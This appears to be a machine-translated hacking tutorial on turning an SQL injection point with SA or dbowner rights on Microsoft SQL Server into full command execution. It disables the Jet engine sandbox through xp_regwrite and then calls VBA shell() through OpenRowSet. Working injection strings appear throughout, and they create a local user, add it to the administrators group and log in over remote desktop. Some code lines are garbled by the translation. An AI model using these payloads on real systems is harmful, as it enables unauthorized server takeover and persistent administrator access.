[SQL Server] [access] Sandbox Vulnerability

First of all, I know in the <jet engine can call VBA shell () function> (http://www.520hack.com) this information can be directly performed in the accessl SQL query, the specific test in access. the test SQL statement is as follows:

Select shell ('C:/Windows/system32/cmd.exe/C net user Ray 123/ad ');

Check the local user managed by the computer and immediately find another ray user. This indicates that the statement is successfully executed. Then, write a vbs script to connect to an MDB to test the SQL statement.

Set conn = Createobject ("ADODB. Connection ")

Conn. Open "provider = Microsoft. Jet. oledb.4.0; Data Source = test. mdb"

Set rsw.conn.exe cute ("select shell (" "cmd.exe/C net user Ray 123/ad "")")
Msgbox RS (0)

After running, the error "'shell' function in the expression is undefined" appears. <The jet engine can call the shell () of VBA () function> mentioned that Windows has set a switch named sandboxmode in the jet engine. Its registry is located in HKEY_LOCAL_MACHINE/software/Microsoft/jet/4.0/engine/sandboxmode, 0 indicates that security settings are disabled in any owner, 1 indicates that the security settings are only within the permitted range, 2 indicates that the security settings must be in access mode, and 3 indicates that the security settings are fully enabled. the default value is 2. You can only call the shell () function of VBA in access mode. We try to change the registry value to 0, as a result, vbs is successfully run. Using the jet engine, you can call the shell () function of VBA to execute system commands.

Generally, an MSSQL Server supports the ACCESS database at the same time, so as long as there is a sa or dbowner connection, it meets the conditions for modifying the registry, because MSSQL has an extension named xp_regwrite, it is used to modify the registry value. syntax:

Exec maseter. DBO. xp_regwrite root_key, subkey, value_type, Value

If there is an SQL injection point connected by SA or dbowner, the following injection statement can be constructed:

Injectionurl; Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engine', 'sandboxmode', 'reg _ dword', '0 '--

Modify the registry value of the sandboxmode switch to 0. connect to an Access database to execute system commands, of course, to execute system commands, we only need an Access database-related select injection point or directly use the ASP file select to call this VBA shell () function, but in fact MSSQL has an OpenRowSet function, it is used to open a special database or connect to another database. when we have a SA permission connection, we can enable the jet engine to connect to an Access database. At the same time, we can search for system files and find that there are two access databases in the Windows System directory, the location is % WINDIR %/system32/IAS. MDB or % WINDIR %/system32/IAS/dnary. in this way, we can use the OpenRowSet function to construct the following injection statement:

Injectionurl '; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = C:/winnt/system32/IAS. MDB ', 'select shell ("Net user Ray 123/ad ")');--

If you don't know much about it, I can give you a simplified understanding:

1. Access can call the vbs function and execute any command with the system permission.

2. Access must be enabled to execute this command.

3. This switch is in the registry.

4. SA has the permission to write the registry.

5. Enable the switch with the SA Registry Write Permission

6. Call the command execution method in access to execute any command with the system permission.

Therefore, today I use HDSI to execute the SQL command and run the following command:

Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engines', 'sandboxmode', 'reg _ dword', 0

Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = C:/Windows/system32/IAS. MDB ', 'select shell ("Net user zyqq 123/Add ")');

Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = C:/Windows/system32/IAS. MDB ', 'select shell ("net localgroup administrators zyqq/Add ")');

Finally, use the new user to successfully log on to 3389!